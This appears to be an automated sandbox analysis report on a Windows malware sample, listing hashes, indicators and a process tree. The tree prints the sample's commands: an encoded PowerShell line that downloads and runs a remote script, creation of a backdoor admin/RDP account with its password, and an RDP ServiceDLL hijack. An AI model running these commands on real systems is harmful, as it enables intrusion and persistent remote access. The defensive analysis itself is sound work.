Analysis
- Max time kernel: 62s
- Max time network: 115s
- Platform: windows10_x64
- Resource: win10v20210408
- Submitted: 20-08-2021 20:46

Static task: static1

Behavioral task: behavioral1
- Sample: 3cb66d271255d59945381fdc6fab9b91.exe
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: 3cb66d271255d59945381fdc6fab9b91.exe
- Resource: win10v20210408
General
- Target: 3cb66d271255d59945381fdc6fab9b91.exe
- Size: 5.9MB
- MD5: 3cb66d271255d59945381fdc6fab9b91
- SHA1: cba5bc5d238ffa84cadb81d8ac65c81c289ec74a
- SHA256: 5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa
- SHA512: 770a6f375c8ba6c3c4a7da63652b58ccac9a3a0c005cf1cfc8db21447ae247bcc705c8f20da683ca89e1f0102604e23310be76c4c5daf358f81d2b36008c9a75
Malware Config
Extracted:
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow, pid, process):
  - 17, 4004, powershell.exe
  - 19, 4004, powershell.exe
  - 20, 4004, powershell.exe
  - 21, 4004, powershell.exe
  - 23, 4004, powershell.exe
  - 25, 4004, powershell.exe
  - 27, 4004, powershell.exe
  - 29, 4004, powershell.exe
  - 31, 4004, powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
  Resources (resource, yara_rule):
  - \Windows\Branding\mediasrv.png, upx
  - \Windows\Branding\mediasvc.png, upx
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
  - 576, 576
- Drops file in Program Files directory (4 IoCs)
  Processes (description, ioc, process):
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI, powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description, ioc, process):
  - File created, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\branding\mediasvc.png, powershell.exe
  - File opened for modification, C:\Windows\branding\Basebrd, powershell.exe
  - File opened for modification, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_cl2he5jg.rlx.ps1, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1108.tmp, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log, powershell.exe
  - File opened for modification, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xdotdir5.oah.psm1, powershell.exe
  - File created, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1176.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1197.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI11F5.tmp, powershell.exe
  - File created, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File opened for modification, C:\Windows\branding\ShellBrd, powershell.exe
  - File opened for modification, C:\Windows\branding\mediasvc.png, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1216.tmp, powershell.exe
  - File opened for modification, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (description, ioc, process):
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  - HTTP User-Agent header, 21, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, 23, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, 19, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, 20, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid, process):
  - 2424, powershell.exe
  - 2424, powershell.exe
  - 2424, powershell.exe
  - 2164, powershell.exe
  - 2164, powershell.exe
  - 2164, powershell.exe
  - 3176, powershell.exe
  - 3176, powershell.exe
  - 3176, powershell.exe
  - 3968, powershell.exe
  - 3968, powershell.exe
  - 3968, powershell.exe
  - 2424, powershell.exe
  - 2424, powershell.exe
  - 2424, powershell.exe
  - 4004, powershell.exe
  - 4004, powershell.exe
  - 4004, powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid, process):
  - 616, 616
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process):
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process):
Processes
Process tree (indentation shows parent/child depth; each entry lists image path, PID, command line and matched signatures):

- C:\Users\Admin\AppData\Local\Temp\3cb66d271255d59945381fdc6fab9b91.exe (PID 860)
  Command line: "C:\Users\Admin\AppData\Local\Temp\3cb66d271255d59945381fdc6fab9b91.exe"
  Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2424)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1464)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lcnd1suy\lcnd1suy.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2084)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB079.tmp" "c:\Users\Admin\AppData\Local\Temp\lcnd1suy\CSCFAAD2F90B96C460FA87F33275A183EC.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2164)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3176)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3968)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (PID 2312)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (PID 576)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (PID 1152)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (PID 4088)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 1436)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (PID 3852)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 3932)
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 3524)
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 2060)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (PID 3028)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 496)
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 2292)
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 2312)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (PID 496)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (PID 2364)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

- C:\Windows\System32\cmd.exe (PID 2324)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3928)
    Command line: net.exe user WgaUtilAcc 000000 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3840)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

- C:\Windows\System32\cmd.exe (PID 768)
  Command line: cmd /C net.exe user WgaUtilAcc YsAAvQra /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3584)
    Command line: net.exe user WgaUtilAcc YsAAvQra /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3692)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc YsAAvQra /add

- C:\Windows\System32\cmd.exe (PID 4088)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2188)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3268)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

- C:\Windows\System32\cmd.exe (PID 3488)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2672)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1064)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

- C:\Windows\System32\cmd.exe (PID 3828)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 4084)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 2184)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

- C:\Windows\System32\cmd.exe (PID 3692)
  Command line: cmd /C net.exe user WgaUtilAcc YsAAvQra
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 736)
    Command line: net.exe user WgaUtilAcc YsAAvQra
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4000)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc YsAAvQra

- C:\Windows\System32\cmd.exe (PID 3268)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe (PID 2672)
    Command line: wmic path win32_VideoController get name

- C:\Windows\System32\cmd.exe (PID 2276)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (PID 812)
    Command line: wmic CPU get NAME

- C:\Windows\System32\cmd.exe (PID 2160)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (PID 3932)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4004)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads